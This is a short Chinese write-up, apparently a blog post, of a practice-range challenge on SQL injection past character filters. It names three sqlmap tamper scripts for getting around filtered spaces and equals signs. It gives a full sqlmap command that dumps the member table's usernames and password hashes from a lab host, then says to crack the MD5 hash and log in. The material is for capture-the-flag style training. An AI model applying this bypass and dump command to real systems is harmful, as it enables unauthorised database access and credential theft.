360众测靶场题库之64- SQL过滤字符后手工注入漏洞测试(第1题)

经过测试,确定注入点在维护界面的URL链接的id参数中,并且后台有关键字以及特殊字符的过滤,等号以及空格被过滤,要做URL编码绕过。

sqlmap注入:

上sqlmap前,要先了解SQLMAP的绕过脚本使用,这题中使用到了三个绕过脚本:

1.charencode脚本:URL编码脚本;

2.equaltolike脚本:将等号转换为like脚本;

3.space2comment脚本:空格绕过脚本。

payload:

python sqlmap.py -u "http://219.153.49.228:44260/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C 'status,name,password' --dump --batch

将status为1的密码MD5解密一下即可得到登录密码,接着登录拿key~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值